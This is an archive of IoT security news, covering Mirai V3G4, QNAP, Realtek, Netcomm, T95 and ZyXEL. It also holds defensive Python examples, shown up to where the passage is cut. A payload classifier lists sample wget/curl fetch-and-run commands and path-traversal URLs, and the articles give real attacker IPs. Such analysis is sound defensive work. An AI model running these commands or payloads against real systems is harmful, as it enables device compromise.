Category Archives: Internet of Things

Mirai V3G4 botnet exploits 13 flaws to target IoT devices

During the second half of 2022, a variant of the Mirai bot, tracked as V3G4, targeted IoT devices by exploiting 13 known vulnerabilities.

Palo Alto Networks Unit 42 researchers reported that a Mirai variant tracked as V3G4 attempted to exploit 13 flaws to infect IoT devices between July and December 2022.

Below is the list of vulnerabilities exploited by V3G4:

The threat actors’ goal is to infect as many systems as possible to build a botnet that can be used to conduct multiple attacks, including DDoS attacks.

The researchers have observed three different Mirai V3G4 campaigns likely operated by the same threat actor for the following reasons:

  • The hardcoded command and control (C2) domains among these three campaigns contain the same string (8xl9)
  • The malware shell script downloaders are almost identical between the three campaigns
  • The botnet client samples use the same XOR decryption key
  • The botnet client samples use the same “stop list” (a list of target processes that the botnet client searches for and terminates)
  • The botnet client samples use almost identical functions

The botnet exploited 13 vulnerabilities to achieve remote code execution on vulnerable devices. Upon successful exploitation, the injected command runs the wget and curl utilities to download the Mirai bot from the attackers’ infrastructure and then executes it.

Upon execution, the bot prints the string xXxSlicexXxxVEGA. to the console. The experts noticed that V3G4 also includes a function that ensures only one instance of the malware runs on the compromised device: if a botnet process already exists, the new botnet client exits.

The botnet also attempts to terminate a list of processes, included in the hardcoded ‘stop list,’ by checking their names on the infected device.

Unlike most Mirai variants, the V3G4 variant uses different XOR encryption keys for string encryption.
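To make the string-table point concrete, the following is an added example (not code from Unit 42 or from any V3G4 sample) of how Mirai-derived bots obfuscate their string table with XOR and how an analyst recovers the key from a sample. The 0xDEADBEEF key is the one in the leaked original Mirai source; the table below is constructed and encoded with that key because the V3G4 keys themselves are not given here. Recovering the same key from samples of different campaigns is exactly the kind of link the researchers used to attribute the three campaigns to one operator.

```python
from typing import Iterable, List, Tuple

# Strings found in nearly every Mirai-derived string table; a candidate key is
# scored by how many of them appear once the table is decoded with it.
CRIBS = (b"/bin/busybox", b"/proc/", b"watchdog", b"shell", b"enable")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encodes and decodes."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def mirai_effective_key(table_key: int) -> int:
    """Original Mirai XORs every byte with the four key bytes in turn, which
    collapses to a single byte k1 ^ k2 ^ k3 ^ k4 (0x22 for 0xDEADBEEF)."""
    return (table_key ^ (table_key >> 8) ^ (table_key >> 16) ^ (table_key >> 24)) & 0xFF


def crib_score(plain: bytes, cribs: Iterable[bytes] = CRIBS) -> int:
    """Number of crib occurrences in a candidate decoding."""
    return sum(plain.count(c) for c in cribs)


def recover_single_byte_key(blob: bytes, cribs: Iterable[bytes] = CRIBS) -> Tuple[int, int]:
    """Try all 256 single-byte keys and return (best_key, crib_hits)."""
    cribs = tuple(cribs)
    scored = [(crib_score(xor_bytes(blob, bytes([k])), cribs), k) for k in range(256)]
    hits, key = max(scored)
    return key, hits


def split_table(plain: bytes) -> List[str]:
    """Mirai keeps its strings NUL-terminated, back to back."""
    return [s.decode("latin-1") for s in plain.split(b"\x00") if s]


# Constructed sample table (not from a real sample), encoded with the
# original Mirai key; V3G4's own keys differ and are not reproduced here.
ASSUMED_KEY = mirai_effective_key(0xDEADBEEF)          # 0x22
SAMPLE_TABLE = b"\x00".join(
    [b"/bin/busybox", b"/proc/", b"watchdog", b"shell", b"enable", b"/dev/watchdog"]
) + b"\x00"
ENCODED_TABLE = xor_bytes(SAMPLE_TABLE, bytes([ASSUMED_KEY]))


if __name__ == "__main__":
    key, hits = recover_single_byte_key(ENCODED_TABLE)
    print(f"recovered key 0x{key:02x} ({hits} crib hits)")
    for s in split_table(xor_bytes(ENCODED_TABLE, bytes([key]))):
        print("  ", s)
```

Where a variant uses a multi-byte key, the same crib scoring works over a key-length guess (the `xor_bytes` helper already takes an arbitrary key); a known plaintext such as `/bin/busybox` also gives the key directly as ciphertext XOR plaintext.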

The researchers also noticed minor differences between the bot samples from the three campaigns. The original Mirai botnet spreads by brute-forcing weak Telnet/SSH credentials, while other variants rely on both brute-force attacks and embedded exploits to spread.

However, bot samples discovered between September and December 2022 don’t contain the functions of vulnerability exploitation and brute force of credentials.

“The vulnerabilities mentioned above have less attack complexity than previously observed variants, but they maintain a critical security impact that can lead to remote code execution. Once the attacker gains control of a vulnerable device in this manner, they could take advantage by including the newly compromised devices in their botnet to conduct further attacks such as DDoS.” concludes the report. “Therefore, it is highly recommended that patches and updates are applied when possible.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, V3G4)

Over 30k Internet-Exposed QNAP NAS hosts impacted by CVE-2022-27596 flaw

Censys found about 30,000 internet-facing QNAP appliances potentially impacted by a recently disclosed critical code-injection flaw.

On January 30, Taiwanese vendor QNAP released QTS and QuTS firmware updates to address a critical vulnerability, tracked as CVE-2022-27596 (CVSS v3 score: 9.8), that affects QNAP NAS devices.

A remote attacker can exploit the vulnerability to inject malicious code on QNAP NAS devices. The flaw is easy to exploit without user interaction or privileges on the vulnerable device.

The flaw impacts QTS 5.0.1 and QuTS hero h5.0.1 versions.

“A vulnerability has been reported to affect QNAP devices running QTS 5.0.1 and QuTS hero h5.0.1. If exploited, this vulnerability allows remote attackers to inject malicious code.” reads the advisory published by the Taiwanese vendor.

The company fixed the vulnerability in the following operating system versions:

  • QTS 5.0.1.2234 build 20221201 and later
  • QuTS hero h5.0.1.2248 build 20221215 and later

Cyber security firm Censys scanned the Internet for exposed QNAP appliances and found about 30,000 devices that are likely affected by CVE-2022-27596 because they run firmware older than the fixed QTS and QuTS hero builds.

Censys identified 67,415 hosts that appeared to run a QNAP-based system, but could obtain a version number from only 30,520 of them.

“But, if the advisory is correct, over 98% of identified QNAP devices would be vulnerable to this attack. We found that of the 30,520 hosts with a version, only 557 were running QuTS Hero greater than or equal to “h5.0.1.2248” or QTS greater than or equal to “5.0.1.2234”, meaning 29,968 hosts could be affected by this vulnerability.” reads the report published by Censys. “If the exploit is published and weaponized, it could spell trouble to thousands of QNAP users. Everyone must upgrade their QNAP devices immediately to be safe from future ransomware campaigns.”

Most of the vulnerable hosts discovered by Censys are in Italy (3,200), followed by the US (3,149) and Taiwan (1,942).

The researchers used the advisory (QSA-23-01) to determine the vulnerable versions and found that the most common vulnerable versions are:

Version   Host Count
5.0.0     7,383
4.3.3     6,993
4.3.6     4,777
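The version check Censys applied is easy to reproduce. The following is an added example, not Censys’ or QNAP’s code: it parses QTS and QuTS hero version strings (the QuTS hero line carries an "h" prefix), compares them with the fixed builds from QSA-23-01, and counts hosts both the way the Censys report did (everything below the fixed build) and the narrower way the advisory reads (only the 5.0.1 / h5.0.1 line). The version list at the bottom is constructed sample input, not scan data.

```python
import re
from typing import Dict, Iterable, Tuple

# Fixed builds from QNAP advisory QSA-23-01
FIXED = {"QTS": (5, 0, 1, 2234), "QuTS hero": (5, 0, 1, 2248)}
VULN_BRANCH = (5, 0, 1)  # the only release line the advisory names as affected

_VER = re.compile(r"^(h)?(\d+(?:\.\d+){1,3})(?:\s+build\s+\d+)?$", re.IGNORECASE)


def parse_version(s: str) -> Tuple[str, Tuple[int, ...]]:
    """'h5.0.1.2248' -> ('QuTS hero', (5,0,1,2248)); '5.0.0' -> ('QTS', (5,0,0,0))."""
    m = _VER.match(s.strip())
    if not m:
        raise ValueError(f"unrecognised QNAP version string: {s!r}")
    product = "QuTS hero" if m.group(1) else "QTS"
    parts = tuple(int(p) for p in m.group(2).split("."))
    parts += (0,) * (4 - len(parts))  # pad short strings so tuples compare cleanly
    return product, parts


def is_patched(s: str) -> bool:
    """Censys' reading: anything below the fixed build for its product is exposed."""
    product, v = parse_version(s)
    return v >= FIXED[product]


def affected_per_advisory(s: str) -> bool:
    """Narrower reading: only the 5.0.1 / h5.0.1 line below the fixed build."""
    product, v = parse_version(s)
    return v[:3] == VULN_BRANCH and v < FIXED[product]


def triage(versions: Iterable[str]) -> Dict[str, int]:
    """Count hosts the way the Censys report did and the way the advisory reads."""
    versions = list(versions)
    return {
        "hosts": len(versions),
        "below_fix": sum(1 for v in versions if not is_patched(v)),
        "affected_5_0_1_line": sum(1 for v in versions if affected_per_advisory(v)),
    }


# Constructed sample: the builds other than the fixed ones are made up for the illustration.
SAMPLE_VERSIONS = [
    "5.0.1.2234 build 20221201",  # QTS, fixed build
    "5.0.1.2194",                 # QTS 5.0.1, older build
    "h5.0.1.2248",                # QuTS hero, fixed build
    "h5.0.1.2221",                # QuTS hero 5.0.1, older build
    "5.0.0",
    "4.3.6",
    "4.3.3",
]

if __name__ == "__main__":
    print(triage(SAMPLE_VERSIONS))
```

The two counts differ on purpose: the advisory names only the 5.0.1 lines, while Censys counted every host below the fixed build, which is why its figure also includes the 5.0.0 and 4.3.x hosts in the table above.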

“while there are no indications that bad actors are using this new exploit, the threat is definitely on the horizon.” Censys concludes.


Pierluigi Paganini

(SecurityAffairs – hacking, IoT)

QNAP addresses a critical flaw impacting its NAS devices

Taiwanese vendor QNAP is warning customers to install QTS and QuTS firmware updates to address a critical flaw impacting its NAS devices.

QNAP released QTS and QuTS firmware updates to address a critical vulnerability, tracked as CVE-2022-27596 (CVSS v3 score: 9.8), that affects QNAP NAS devices.

A remote attacker can exploit the vulnerability to inject malicious code on QNAP NAS devices. The flaw is easy to exploit without user interaction or privileges on the vulnerable device.

The flaw impacts QTS 5.0.1 and QuTS hero h5.0.1 versions.

“A vulnerability has been reported to affect QNAP devices running QTS 5.0.1 and QuTS hero h5.0.1. If exploited, this vulnerability allows remote attackers to inject malicious code.” reads the advisory published by the Taiwanese vendor.

“We have already fixed this vulnerability in the following operating system versions:

  • QTS 5.0.1.2234 build 20221201 and later
  • QuTS hero h5.0.1.2248 build 20221215 and later”

Below is the step-by-step procedure to update QTS or QuTS hero:

  1. Log in to QTS or QuTS hero as an administrator.
  2. Go to Control Panel > System > Firmware Update.
  3. Under Live Update, click Check for Update.
    QTS or QuTS hero downloads and installs the latest available update.

Users can also download the update from the QNAP website by going to Support > Download Center and then performing a manual update for their specific device.

The company urges customers to apply security updates as soon as possible.


Pierluigi Paganini

(SecurityAffairs – hacking, Moshen Dragon)

Experts warn of a surge of attacks exploiting a Realtek Jungle SDK RCE (CVE-2021-35394)

Experts warn of a spike, between August and October 2022, in attacks attempting to exploit a Realtek Jungle SDK RCE (CVE-2021-35394).

Palo Alto Networks researchers reported that, between August and October 2022, attempts to exploit the Realtek Jungle SDK RCE CVE-2021-35394 (CVSS score 9.8) accounted for more than 40% of the total number of attacks the company observed.

“Realtek Jungle SDK version v2.x up to v3.4.14B provides a diagnostic tool called ‘MP Daemon’ that is usually compiled as ‘UDPServer’ binary. The binary is affected by multiple memory corruption vulnerabilities and an arbitrary command injection vulnerability that can be exploited by remote unauthenticated attackers.” reads the description for this flaw.

As of December 2022, experts observed 134 million exploit attempts in total leveraging this flaw, and about 97% of these attacks occurred after the start of August 2022.

The experts warned that the attacks conducted by multiple threat actors are still ongoing.

A large number of these attacks attempted to deliver malware to vulnerable IoT devices. Most of the malware samples analyzed by the researchers belong to the Mirai, Gafgyt and Mozi families. Palo Alto Networks also observed a new IoT distributed denial-of-service (DDoS) botnet written in Golang, tracked as RedGoBot. RedGoBot was involved in multiple campaigns; the first was observed in early September 2022, when the threat actor tried to deliver a shell script downloader, znet.sh, from 185.216.71[.]157 using wget.

A second RedGoBot campaign was observed in November 2022, when the threat actor used a shell script with wget and curl to download botnet clients from 185.246.221[.]220.

The RedGoBot can perform DDoS attacks on HTTP, ICMP, TCP, UDP, VSE and OpenVPN protocols.

It has been estimated that the flaw CVE-2021-35394 affects almost 190 models of devices from 66 different manufacturers.

The analysis of the attacks in the wild revealed the use of the following three types of payloads:

  • A script executes a shell command on the targeted server (mostly from the Mirai family).
  • An injected command directly writes the binary payload to a file and then executes it. 
  • An injected command directly reboots the targeted server to trigger a denial of service condition.
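An added example, not Unit 42’s code, of how a sensor might sort captured injection payloads into the three categories above. The patterns are generic shell-command heuristics and the sample payloads are constructed (documentation addresses, not the indicators from the report); nothing here reproduces the UDPServer injection itself.

```python
import re
from collections import Counter
from typing import Dict, List

DOWNLOADER = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.I)
URL = re.compile(r"(?:https?|tftp|ftp)://[^\s'\";|&]+", re.I)
# echo/printf with \xNN escapes redirected into a file: the binary is written inline
INLINE_BIN = re.compile(r"\b(?:echo|printf)\b[^;|&]*\\x[0-9a-f]{2}[^;|&]*>\s*\S+", re.I)
# a bare reboot, at the start or after a command separator
REBOOT = re.compile(r"(?:^|[;|&`]\s*)(?:/sbin/)?reboot\b", re.I)


def classify(cmd: str) -> str:
    """Map one injected command string to the payload type it belongs to."""
    c = cmd.strip()
    if REBOOT.search(c):
        return "reboot-dos"
    if INLINE_BIN.search(c):
        return "inline-binary"
    if DOWNLOADER.search(c) or URL.search(c):
        return "downloader-script"
    return "unclassified"


def extract_urls(cmd: str) -> List[str]:
    """Pull out download URLs so they can be used as network indicators."""
    return URL.findall(cmd)


def summarize(payloads: List[str]) -> Dict[str, int]:
    """Histogram of payload types over a capture."""
    return dict(Counter(classify(p) for p in payloads))


# Constructed samples in the shape of the three payload types (192.0.2.0/24 is TEST-NET-1)
SAMPLE_PAYLOADS = [
    "cd /tmp; wget http://192.0.2.10/bins.sh; chmod +x bins.sh; sh bins.sh",
    "cd /tmp || cd /var; curl -O http://192.0.2.10/arm7; chmod 777 arm7; ./arm7",
    "echo -ne '\\x7f\\x45\\x4c\\x46\\x01\\x01' > /tmp/.x; chmod 777 /tmp/.x; /tmp/.x",
    "/sbin/reboot",
    "sleep 1; reboot",
    "ls -la /tmp",
]

if __name__ == "__main__":
    for p in SAMPLE_PAYLOADS:
        print(f"{classify(p):18} {extract_urls(p)}  {p}")
    print(summarize(SAMPLE_PAYLOADS))
```

The reboot check runs first because a reboot can follow any other command and is the one outcome you want to catch regardless of what precedes it; the URL extraction is what feeds blocklists when the downloader form is seen.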

The analysis of the origin of the attacks revealed that the United States is the main source of attacks (48.3% of the total), followed by Vietnam (17.8%) and Russia (14.6%). 

However, we have to consider that the attackers might have used proxy servers and VPNs located in those countries to hide their actual physical locations.

“The surge of attacks leveraging CVE-2021-35394 shows that threat actors are very interested in supply chain vulnerabilities, which can be difficult for the average user to identify and remediate. These issues can make it difficult for the affected user to identify the specific downstream products that are being exploited.” concludes the report.


Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2021-35394)


A couple of bugs can be chained to hack Netcomm routers

A couple of critical vulnerabilities have been discovered in Netcomm routers; experts warn of their potential exploitation in the wild.

The vulnerabilities discovered in the Netcomm routers are a stack-based buffer overflow and an authentication bypass, tracked as CVE-2022-4873 and CVE-2022-4874 respectively.

Both issues impact the Netcomm router models NF20MESH, NF20, and NL1902 running software versions earlier than R6B035.

Below are the descriptions for both issues:

CVE-2022-4873 – Stack-based buffer overflow in Netcomm router models NF20MESH, NF20, and NL1902. A specially sized value supplied in the sessionKey parameter overwrites the saved instruction pointer on the stack and crashes the application at a known location, which is what makes code execution possible once the authentication bypass below is used to reach the vulnerable code.

CVE-2022-4874 – Authentication bypass in Netcomm router models NF20MESH, NF20, and NL1902 allows an unauthenticated user to access content. In order to serve static content, the application performs a check for the existence of specific characters in the URL (.css, .png etc). If it exists, it performs a “fake login” to give the request an active session to load the file and not redirect to the login page.
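The authentication-bypass pattern in CVE-2022-4874 is easy to reproduce and to harden against. Below is an added example, not Netcomm’s firmware code: a toy request handler with the flawed check the advisory describes (a substring test for ".css", ".png" and so on anywhere in the URL, followed by a "fake login") next to a corrected version that only serves files whose decoded, normalized path really ends in a static extension and sits under a static directory, and never grants a session for it. The "/static/" URL prefix and "/www/static" root are assumptions made for the illustration.

```python
import posixpath
from urllib.parse import urlsplit, unquote

STATIC_EXT = (".css", ".png", ".js", ".gif", ".ico")
STATIC_URL_PREFIX = "/static/"     # assumed layout for the illustration
STATIC_ROOT = "/www/static"        # assumed on-disk directory


def weak_is_static(url: str) -> bool:
    """The flawed check: does one of the extensions occur ANYWHERE in the URL?
    '/admin/config.cgi?theme=.css' passes, and the request is then given an
    active session ('fake login') instead of a redirect to the login page."""
    return any(ext in url for ext in STATIC_EXT)


def strong_static_path(url: str):
    """Return the on-disk path of a genuine static asset, else None.
    Decodes and normalizes the PATH only (the query string is ignored), requires
    the extension to be the real suffix, and refuses anything escaping STATIC_ROOT."""
    path = posixpath.normpath(unquote(urlsplit(url).path))
    if not path.startswith(STATIC_URL_PREFIX):
        return None
    if posixpath.splitext(path)[1].lower() not in STATIC_EXT:
        return None
    full = posixpath.normpath(posixpath.join(STATIC_ROOT, path[len(STATIC_URL_PREFIX):]))
    if not full.startswith(STATIC_ROOT + "/"):
        return None
    return full


def handle(url: str, authenticated: bool, mode: str = "weak") -> str:
    """Toy router front end: static assets need no session, everything else does."""
    if mode == "weak":
        if weak_is_static(url):
            return "200 fake-session " + urlsplit(url).path
    else:
        full = strong_static_path(url)
        if full is not None:
            return "200 static " + full
    if not authenticated:
        return "302 /login"
    return "200 app " + urlsplit(url).path


if __name__ == "__main__":
    for url in ("/static/logo.png", "/admin/config.cgi?theme=.css",
                "/static/../admin.cgi?x=.png", "/static/%2e%2e/%2e%2e/etc/passwd.css"):
        print(f"{url:45} weak: {handle(url, False, 'weak'):40} strong: {handle(url, False, 'strong')}")
```

The hardened version does three things the substring test does not: it looks only at the path (so query strings cannot smuggle an extension in), it checks the real suffix after percent-decoding and `..` normalization, and it never converts "this is a static file" into "this request is logged in".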

The CERT Coordination Center (CERT/CC) also published an advisory warning that the two issues can be chained to achieve remote code execution on vulnerable systems.

“Netcomm router models NF20MESH, NF20, and NL1902 running software versions earlier than R6B035 contain two vulnerabilities.” reads the advisory. “The two vulnerabilities, when chained together, permit a remote, unauthenticated attacker to execute arbitrary code.”

The advisory pointed out that once an attacker has obtained unauthorized access to an affected device, they can use it as an entry point to reach other systems on the network or to compromise the availability, integrity, or confidentiality of data transmitted from the internal network.

The flaws were discovered by Brendan Scarvell, who also published a proof-of-concept (PoC) exploit showing how to chain the two vulnerabilities to achieve unauthenticated remote code execution.


Pierluigi Paganini

(SecurityAffairs – hacking, Netcomm)


T95 Android TV Box sold on Amazon hides sophisticated malware

A security researcher discovered that the T95 Android TV box, sold on Amazon and AliExpress, ships with sophisticated pre-installed malware.

Security researcher, Daniel Milisic, discovered that the T95 Android TV box he purchased on Amazon was infected with sophisticated pre-installed malware.

This Android TV box model is available on Amazon and AliExpress for as low as $40.

The device came with Android 10 (with a working Play Store) and an Allwinner H616 processor. Milisic discovered malware pre-loaded in its firmware.

Milisic purchased the T95 Android TV box to run Pi-hole, which is a Linux network-level advertisement and Internet tracker blocking application.

After running Pi-hole, he noticed that the box was reaching addresses associated with malware campaigns.

“After searching unsuccessfully for a clean ROM, I set out to remove the malware in a last-ditch effort to make the T95 useful. I found layers on top of layers of malware using tcpflow and nethogs to monitor traffic and traced it back to the offending process/APK which I then removed from the ROM.” the expert wrote on Reddit.

“The final bit of malware I could not track down injects the system_server process and looks to be deeply-baked into the ROM. It’s pretty sophisticated malware, resembling CopyCat in the way it operates. It’s not found by any of the AV products I tried — If anyone can offer guidance on how to find these hooks into system_server please let me know here or via PM.”

The device runs an Android 10 build signed with test keys. The researcher also found that the Android Debug Bridge (ADB) was reachable over the Ethernet port.

The malicious code embedded in the device’s firmware behaves like the Android CopyCat malware. The researcher pointed out that none of the AV products he tested was able to detect the threat.

Milisic also devised a workaround that blocks the malware by using Pi-hole to resolve the command-and-control domain, YCXRL.COM, to 127.0.0.2.

He also added an iptables rule that redirects all DNS traffic to the Pi-hole, because the malware falls back to external DNS servers if it cannot resolve the domain locally.

“By doing this, the C&C server ends up hitting the Pi-hole webserver instead of sending my logins, passwords, and other PII to a Linode in Singapore (currently 139.162.57.135 at time of writing).” continues the expert.

Note that the workaround proposed by Milisic does not remove or disable the malicious code; it only neutralizes it by interfering with its operation.
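How you would verify that such a DNS sinkhole is actually working, and which LAN hosts are calling home, from the Pi-hole (dnsmasq) query log. This is an added example, not Milisic’s script: it parses query, forwarded and reply lines plus the custom.list answer dnsmasq logs for a local override, lists the clients that asked for the C2 domain, and flags any query that was forwarded upstream or answered with something other than the sinkhole address. The log excerpts are constructed in dnsmasq’s format and use a documentation address (198.51.100.7) in place of the real C2 IP.

```python
import re
from typing import Dict, Iterable, Set

QUERY = re.compile(r"query\[(\w+)\] (\S+) from (\S+)")
FORWARD = re.compile(r"forwarded (\S+) to (\S+)")
# 'reply x is y', 'cached x is y', and '/etc/pihole/custom.list x is y' for local overrides
ANSWER = re.compile(r"(?:reply|cached|/\S+) (\S+) is (\S+)")


def _empty() -> Dict[str, Set[str]]:
    return {"clients": set(), "forwarded_to": set(), "answers": set()}


def parse_dnsmasq(lines: Iterable[str]) -> Dict[str, Dict[str, Set[str]]]:
    """Per domain: which clients asked, where it was forwarded, what was answered."""
    seen: Dict[str, Dict[str, Set[str]]] = {}
    for line in lines:
        if m := QUERY.search(line):
            seen.setdefault(m.group(2).lower().rstrip("."), _empty())["clients"].add(m.group(3))
        elif m := FORWARD.search(line):
            seen.setdefault(m.group(1).lower().rstrip("."), _empty())["forwarded_to"].add(m.group(2))
        elif m := ANSWER.search(line):
            seen.setdefault(m.group(1).lower().rstrip("."), _empty())["answers"].add(m.group(2))
    return seen


def sinkhole_report(lines: Iterable[str], c2_domain: str, sinkhole_ip: str) -> Dict[str, object]:
    """Infected hosts are the clients that queried the C2 domain. The sinkhole holds
    only if every answer was the override address and nothing went upstream."""
    rec = parse_dnsmasq(lines).get(c2_domain.lower().rstrip("."), _empty())
    leaked = bool(rec["forwarded_to"]) or any(a != sinkhole_ip for a in rec["answers"])
    return {
        "infected_hosts": sorted(rec["clients"]),
        "sinkholed": bool(rec["answers"]) and not leaked,
        "leaked_upstream": leaked,
    }


# Constructed excerpts: private LAN addresses for the clients, TEST-NET-2 for the upstream answer.
SINKHOLED_LOG = """\
Jan 14 10:15:02 dnsmasq[612]: query[A] ycxrl.com from 192.168.1.50
Jan 14 10:15:02 dnsmasq[612]: /etc/pihole/custom.list ycxrl.com is 127.0.0.2
Jan 14 10:15:09 dnsmasq[612]: query[A] ycxrl.com from 192.168.1.77
Jan 14 10:15:09 dnsmasq[612]: /etc/pihole/custom.list ycxrl.com is 127.0.0.2
Jan 14 10:15:11 dnsmasq[612]: query[A] example.org from 192.168.1.50
Jan 14 10:15:11 dnsmasq[612]: forwarded example.org to 9.9.9.9
""".splitlines()

LEAKY_LOG = """\
Jan 14 11:02:40 dnsmasq[612]: query[A] ycxrl.com from 192.168.1.50
Jan 14 11:02:40 dnsmasq[612]: forwarded ycxrl.com to 8.8.8.8
Jan 14 11:02:41 dnsmasq[612]: reply ycxrl.com is 198.51.100.7
""".splitlines()

if __name__ == "__main__":
    print("override in place:", sinkhole_report(SINKHOLED_LOG, "YCXRL.COM", "127.0.0.2"))
    print("override missing: ", sinkhole_report(LEAKY_LOG, "ycxrl.com", "127.0.0.2"))
```

The second excerpt is what the log looks like before the override exists, or when a box bypasses the Pi-hole by talking to an external resolver directly; that is the case the iptables redirect rule is there to close, and a "forwarded" line for the C2 domain is the quickest sign that it is not in place.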

To determine whether a T95 Android TV Box is infected, the researcher recommends checking for the presence of a folder named:

/data/system/Corejava

and a file named

/data/system/shared_prefs/open_preference.xml

Milisic was not able to test other devices from the same vendor or model to determine if their firmware was infected too.

“Don’t trust cheap Android boxes on AliExpress or Amazon that have firmware signed with test keys. They are stealing your data and (unless you can watch DNS logs) do so without a trace!” Milisic concludes.

Below are the cleanup instructions provided by the researcher on GitHub:

  • Reboot into recovery to reset the device or use the Reset option in the ‘about’ menu to Factory Reset the T95
  • When device comes back online, connect to adb via USB A-to-A cable or WiFi/Ethernet
  • Run the script (WiP!)


Pierluigi Paganini

(SecurityAffairs – hacking, malware)


Synology fixes multiple critical vulnerabilities in its routers

Synology fixed several critical flaws in its routers, including flaws likely demonstrated at the Pwn2Own 2022 hacking contest.

Taiwanese NAS maker Synology published two new critical advisories in December. The first covers the most severe vulnerability addressed by the company, a critical out-of-bounds write issue tracked as CVE-2022-43931 (CVSS 3 base score 10).

The vulnerability resides in the Remote Desktop Functionality of Synology VPN Plus Server before 1.4.3-0534 and 1.4.4-0635. A remote attacker can exploit the flaw to execute arbitrary commands via unspecified vectors.

“Out-of-bounds write vulnerability in Remote Desktop Functionality in Synology VPN Plus Server before 1.4.3-0534 and 1.4.4-0635 allows remote attackers to execute arbitrary commands via unspecified vectors.” reads the advisory published by the company.

The vulnerability was discovered by researchers at the Synology PSIRT.

The second advisory addressed multiple vulnerabilities impacting the Synology Router Manager (SRM). The Router Manager (SRM) is the operating system that powers every Synology Router. An attacker can trigger the flaws to execute arbitrary commands, cause a denial-of-service condition or read arbitrary files.

“Multiple vulnerabilities allow remote attackers to execute arbitrary command, conduct denial-of-service attacks or read arbitrary files via a susceptible version of Synology Router Manager (SRM).” reads the advisory.

The flaws impact SRM 1.3 and SRM 1.2 and were reported by:

  • Orange Tsai from Devcore
  • Gaurav Baruah working with Trend Micro’s Zero Day Initiative
  • Computest working with Trend Micro’s Zero Day Initiative
  • Lukas Kupczyk from CrowdStrike

It is likely that the exploits for the above flaws were demonstrated during the Pwn2Own Toronto 2022 and reported through Trend Micro’s Zero Day Initiative.

The researcher Gaurav Baruah earned $20,000 for demonstrating a command injection attack against the WAN interface of a Synology RT6600ax router.

Computest earned $5,000 for demonstrating a command injection root shell exploit targeting the LAN interface of a RT6600ax router.


Pierluigi Paganini

(SecurityAffairs – hacking, Routers)


NETGEAR fixes a severe bug in its routers. Patch it asap!

Netgear addressed a high-severity bug affecting multiple WiFi router models, including Wireless AC Nighthawk, Wireless AX Nighthawk (WiFi 6), and Wireless AC models.

Netgear fixed a bug affecting multiple WiFi router models, including Wireless AC Nighthawk, Wireless AX Nighthawk (WiFi 6), and Wireless AC router models.

The vendor only said that the flaw is a pre-authentication buffer overflow vulnerability and urged customers to update the firmware of their devices as soon as possible. An attacker can exploit this vulnerability without any permissions or user interaction.

Threat actors often exploit this kind of issue to trigger a DoS condition or to execute arbitrary code on vulnerable devices.

“NETGEAR has released fixes for a pre-authentication buffer overflow security vulnerability” reads the advisory published by the company. “NETGEAR strongly recommends that you download the latest firmware as soon as possible.”

Below is the list of fixes released by the company for the specific product models:

  • RAX40 fixed in firmware version 1.0.2.60
  • RAX35 fixed in firmware version 1.0.2.60
  • R6400v2 fixed in firmware version 1.0.4.122
  • R6700v3 fixed in firmware version 1.0.4.122
  • R6900P fixed in firmware version 1.3.3.152
  • R7000P fixed in firmware version 1.3.3.152
  • R7000 fixed in firmware version 1.0.11.136
  • R7960P fixed in firmware version 1.4.4.94
  • R8000P fixed in firmware version 1.4.4.94

Below are step-by-step instructions to download the latest firmware for impacted router models:

  1. Visit NETGEAR Support.
  2. Start typing your model number in the search box, then select your model from the drop-down menu as soon as it appears.
    If you do not see a drop-down menu, make sure that you entered your model number correctly, or select a product category to browse for your product model.
  3. Click Downloads.
  4. Under Current Versions, select the download whose title begins with Firmware Version.
  5. Click Download.
  6. Follow the instructions in your product’s user manual, firmware release notes, or product support page to install the new firmware.

“The pre-authentication buffer overflow vulnerability remains if you do not complete all recommended steps. NETGEAR is not responsible for any consequences that could have been avoided by following the recommendations in this notification.” concludes the advisory.

The vendor did not reveal whether the flaw has been actively exploited in attacks in the wild.


Pierluigi Paganini

(SecurityAffairs – hacking, Netgear)


Expert found backdoor credentials in ZyXEL LTE3301-M209

The cybersecurity researcher RE-Solver discovered backdoor credentials in ZyXEL LTE3301-M209 LTE indoor routers.

Security researcher RE-Solver announced the discovery of hardcoded credentials (CVE-2022-40602) in ZyXEL LTE3301-M209 LTE indoor routers.

In previous research, the expert had discovered a Telnet backdoor in the D-Link DWR-921 that is also present in the ZyXEL LTE3301-M209.

The researcher analyzed the commander ELF, focusing on the amit* functions that contained the backdoor in the D-Link routers. Unlike in the D-Link analysis, the researcher had no physical access to the device and instead attempted to retrieve the password from the configuration.

“The firmware is basically a merge of 3 sections, the LZMA section is the kernel, at 0x148CD6 the root-fs and at 0x90BD36 the www content.” wrote the expert. “Inside the last Squashfs there is a [censored] file which contains at 0x10 the Zlib magic bytes.”
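Carving a firmware image of this shape is a routine first step. The following is an added example, not RE-Solver’s tooling: it scans a blob for LZMA, SquashFS and zlib signatures, reports their offsets, and inflates a zlib stream found at a given offset (such as the one 0x10 bytes into the file mentioned above). It runs on a constructed image built in the same three-section shape, so the offsets it prints are not the real ones from the LTE3301-M209 firmware, and the "config" it recovers contains no credentials.

```python
import zlib
from typing import Dict, List, Tuple

# Signatures of the section types named in the write-up. The LZMA one is the common
# "properties 0x5d, 8 MiB dictionary" header used for kernels; other dictionary sizes
# exist, so treat a miss as "look harder", not "absent".
LZMA_MAGIC = b"\x5d\x00\x00\x80\x00"
SQUASHFS_MAGIC = b"hsqs"          # little-endian SquashFS


def looks_like_zlib(two: bytes) -> bool:
    """RFC 1950 header check: CM=8 (deflate), CINFO<=7, CMF*256+FLG divisible by 31."""
    if len(two) < 2:
        return False
    cmf, flg = two[0], two[1]
    return (cmf & 0x0F) == 8 and (cmf >> 4) <= 7 and ((cmf << 8) | flg) % 31 == 0


def find_sections(blob: bytes) -> List[Tuple[int, str]]:
    """Return (offset, kind) for each signature hit, sorted by offset. zlib hits are
    limited to the 0x78 (32 KiB window) family to keep false positives down."""
    hits: List[Tuple[int, str]] = []
    for kind, magic in (("lzma", LZMA_MAGIC), ("squashfs", SQUASHFS_MAGIC)):
        start = 0
        while (pos := blob.find(magic, start)) != -1:
            hits.append((pos, kind))
            start = pos + 1
    for pos in range(len(blob) - 1):
        if blob[pos] == 0x78 and looks_like_zlib(blob[pos:pos + 2]):
            hits.append((pos, "zlib"))
    return sorted(hits)


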